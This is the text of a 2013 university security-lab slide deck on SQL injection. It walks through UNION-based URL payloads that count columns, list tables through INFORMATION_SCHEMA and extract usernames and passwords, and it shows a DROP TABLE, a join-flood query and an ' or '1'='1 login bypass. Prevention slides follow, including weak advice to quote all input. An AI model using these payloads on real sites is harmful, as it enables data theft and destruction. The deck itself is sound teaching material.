This document discusses SQL injection, including what it is, how it works, and how to perform SQL injection attacks to extract information from a database and alter data. It provides examples of SQL queries that can be used to find the number of columns in a table, determine table and column names, and extract or alter data. The document notes that proper input validation and use of prepared statements are needed to prevent SQL injection attacks, and that no single solution can fully prevent SQL injection.
Overview of SQL Injection, its significance, and prevention methods.
Introduction to SQL, its role in web dynamics, and the concept of SQL Injection.
Explains how SQL Injection can occur through user interface forms and URLs.
Using INFORMATION_SCHEMA to find table/column names via SQL Injection.
Processes to extract and manipulate user data from databases through SQL Injection.
Impacts of extensive queries on performance and potential malicious commands.
Illustrates how unauthorized access can be achieved through coding and the importance of developer responsibility.
Effective techniques to prevent SQL Injection, emphasizing proper error handling and secure coding practices. Insights on database security, emphasizing the limits of firewalls and exploring NoSQL database immunity.
Security Lab, UniversityPutra Malaysia
23 May 2013
Sina Manavi
Contact:http
://sinamanavi.blogspot.com/p/about-me.html
2.
• Introduction
• WhySQL Injection
• What is needed for this
• What you can do with SQL Injection
• What are its pros and cons
• Why we need to know and how we can prevent our
database from SQL injection attacks
3.
We are allfamiliar with SQL Language
One of the technology that helped in converting the static
web to dynamic one
SQL is relatively easy to read, a little more difficult to write
Works on Servers such as Apache, MS Server, etc.
SQL Injection means manipulate SQL tables with
unauthorized access
5.
SQL Injectionmay happen only two form of UI
based or URL based
◦ (1) Injecting into a form. Such as username and
password boxes on a login page.
◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php?
pid=10
6.
Simple example:
Select ID from tbl_users
◦ Where ID=“Uid” and pass=“pass”
◦ If it returns any value means that the current inputs are correct
The "INFORMATION_SCHEMA"holds the names
of every table and column on a site, its name will
never change.
◦ Tables holding all the tables name:
"INFORMATION_SCHEMA.TABLES.“
◦ Tables holding all the Column name:
"INFORMATION_SCHEMA.COLUMNS.“
9.
Finding theURL quantity:
◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1--
Increase the 1 , until you got error, then the last number is the column
number
Finding Table name
◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
And it shows:
tbl_user
To Be continued
10.
Now itstime to find out the Column names:
www.yourtarget.com/list.php? ID =
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+
WHERE+table_name=‘tbl_user'--
The result would be as following :
id,username,password
Column names finding step:
www.yourtarget.com/list.php? ID =
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS
+WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'—
Try the columns name until you find your target (e.g username,password, or login)
11.
And Finallyits time to see the records:
◦ www.yourtarget.com/list.php? =-
1+UNION+SELECT+1,username,3+FROM+UserAccounts—
And
◦ www.yourtarget.com/list.php? =-
1+UNION+SELECT+1,password,3+FROM+UserAccounts—
◦ Username=admin password=123456
◦ Stupid admin ha ;)
12.
Now wecan Alter the records as well, lets rock
UPDATE tbl_user
SET password = SHA2('$password')
WHERE id = $id
Or we can Insert a new user with Insert Command
13.
If user_list contains1000 records then, the database is
fired up
SELECT * FROM user_list JOIN user_list
JOIN user_list JOIN user_list JOIN user_list
JOIN user_list
14.
Insert newuser intotbl_user
The maliciouse code can be :
DROP table tbl_user
15.
How itworks
Select * from tbl_users
Where id=“Fname” and pass=“pass”
Malicious Code:
SELECT * FROM table WHERE id= ‘Fname' or '1'='1';
if(mysql_num_rows($result))
//do login
Now the unauthorized user get accessed easily and
bypassed the authorization
16.
Security isthe developer’s job
No database, connector, or framework
can prevent SQL injection all the time
17.
• Implement properError Handling. This would include
using a single error message for all errors.
• Lock down User Database configuration, Specify users,
roles and permissions etc.
• prefix and append a quote to all user input, even if the
data is numeric .
Vipin Samar, Oraclevice president of Database
Security:
“Database Firewall is a good first layer of
defense for databases but it won't protect you from
everything,”
20.
Using Stroprocedures:
CREATEPROCEDURE SP_show_user(IN U_ID)
BEGIN
SELECT * FROM Bugs WHERE User_ID= U_ID;
END
CALL SP_show_user (54)
“Might be helpful but still vulnerable”
21.
I don’thave to worry anymore
Escaping is the fixthe fix
More escaping is better
I can code an escaping function
Only user input is unsafe
Stored procs are the fixthe fix
SQL privileges are the fixthe fix
My app doesn’t need security
Frameworks are the fixthe fix
Parameters quote for you
Parameters are the fixthe fix
Parameters make queries slow
SQL proxies are the fixthe fix
NoSQL databases are the fixthe fix